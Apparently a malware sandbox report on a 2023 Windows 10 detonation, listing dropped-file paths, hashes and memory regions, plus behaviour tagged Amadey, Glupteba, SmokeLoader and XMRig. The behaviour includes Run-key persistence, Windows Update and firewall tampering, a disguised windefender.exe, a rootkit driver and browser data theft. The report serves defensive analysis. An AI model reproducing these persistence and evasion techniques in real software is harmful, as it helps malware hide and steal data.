MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

memory/1620-263-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/1620-264-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/1620-262-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/1620-261-0x0000000002870000-0x00000000028F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/1868-267-0x000000013FAD0000-0x000000013FE8D000-memory.dmp

memory/1980-271-0x0000000000400000-0x0000000000D1B000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 36d64d98fd222e9ba7255b4570177ba6
SHA1 d66785b9f575b3973fc8d4310e32fafd28e25c22
SHA256 ad9694dd910b2e9b29fc21e385b10326ae580e58daa1d992e8cf80a43067104e
SHA512 384118b2a9c8153e14e5a4dcbcd7c9cabf6a1ec226c04530021643b67d02505b2680144418e66fa7f2b68ef23ba98aea17d0191430fd69ef8df693798fd39e4c

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

memory/1328-288-0x000000000271B000-0x0000000002752000-memory.dmp

memory/1328-287-0x0000000002714000-0x0000000002717000-memory.dmp

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/1980-299-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1608-300-0x000000013FB40000-0x000000013FEFD000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/1656-305-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/1804-308-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1656-307-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1980-309-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1804-311-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1980-312-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/1980-316-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1368-318-0x0000000000C90000-0x0000000000C98000-memory.dmp

memory/1368-319-0x0000000000DA4000-0x0000000000DA7000-memory.dmp

memory/1368-320-0x0000000000DAB000-0x0000000000DE2000-memory.dmp

memory/1008-321-0x0000000019C40000-0x0000000019F22000-memory.dmp

memory/1008-322-0x0000000001080000-0x0000000001100000-memory.dmp

memory/1008-324-0x0000000001080000-0x0000000001100000-memory.dmp

memory/1008-323-0x0000000001080000-0x0000000001100000-memory.dmp

memory/1008-325-0x000000000108B000-0x00000000010C2000-memory.dmp

C:\Program Files\Google\Libs\g.log

MD5 37dd19b2be4fa7635ad6a2f3238c4af1
SHA1 e5b2c034636b434faee84e82e3bce3a3d3561943
SHA256 8066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA512 86e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/1560-333-0x0000000000040000-0x0000000000060000-memory.dmp

memory/1608-332-0x000000013FB40000-0x000000013FEFD000-memory.dmp

memory/1804-334-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1560-335-0x0000000140000000-0x00000001407F4000-memory.dmp

memory/1980-336-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1560-337-0x0000000000AE0000-0x0000000000B00000-memory.dmp

memory/1968-338-0x0000000140000000-0x0000000140016000-memory.dmp

memory/1804-339-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1560-340-0x0000000140000000-0x00000001407F4000-memory.dmp

memory/1980-341-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1560-342-0x0000000140000000-0x00000001407F4000-memory.dmp

memory/1560-345-0x0000000140000000-0x00000001407F4000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/1980-355-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1560-356-0x0000000000AE0000-0x0000000000B00000-memory.dmp

memory/1980-357-0x000000002DA70000-0x000000002E295000-memory.dmp

memory/1980-358-0x000000002DA70000-0x000000002E295000-memory.dmp

memory/1608-359-0x0000000000400000-0x0000000000C25000-memory.dmp

memory/1804-360-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/1980-361-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1560-363-0x0000000140000000-0x00000001407F4000-memory.dmp

C:\Windows\System32\drivers\Winmon.sys

MD5 69989105f151015c16a2f422f5722590
SHA1 3fd92c0224de69048fd8f7d06be85709f25d6573
SHA256 b1c321b5e495473a401bd6e6adfe1ec931f8247b1b2646b0e259bff011a0958c
SHA512 f74b8086c083fc90117248ef39a1a64467258740e358aaa6454f24b88af169d27290d0c0a46210746734f975eef320ba2e138b43cdba8c2329c23f140d0c1e71

memory/1608-365-0x0000000000400000-0x0000000000C25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

MD5 f801950a962ddba14caaa44bf084b55c
SHA1 7cadc9076121297428442785536ba0df2d4ae996
SHA256 c3946ec89e15b24b743c46f9acacb58cff47da63f3ce2799d71ed90496b8891f
SHA512 4183bc76bdc84fb779e2e573d9a63d7de47096b63b945f9e335bee95ae28eb208f5ee15f6501ac59623b97c5b77f3455ca313512e7d9803e1704ae22a52459c5

memory/1608-367-0x0000000000400000-0x0000000000C25000-memory.dmp

memory/1560-369-0x0000000140000000-0x00000001407F4000-memory.dmp

memory/1560-371-0x0000000140000000-0x00000001407F4000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-25 10:27

Reported

2023-06-25 10:30

Platform

win10v2004-20230621-en

Max time kernel

151s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Fabookie

spyware stealer fabookie

GCleaner

loader gcleaner

Glupteba

loader dropper glupteba

Glupteba payload

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\System32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\System32\reg.exe N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fileexe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\oldplayer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Notepad\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\XandETC.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Notepad\Chrome\updater.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A
File created C:\Program Files\Google\Libs\g.log C:\Windows\System32\cmd.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ugrceei N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ugrceei N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ugrceei N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2411 = "Marquesas Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-221 = "Alaskan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time" C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
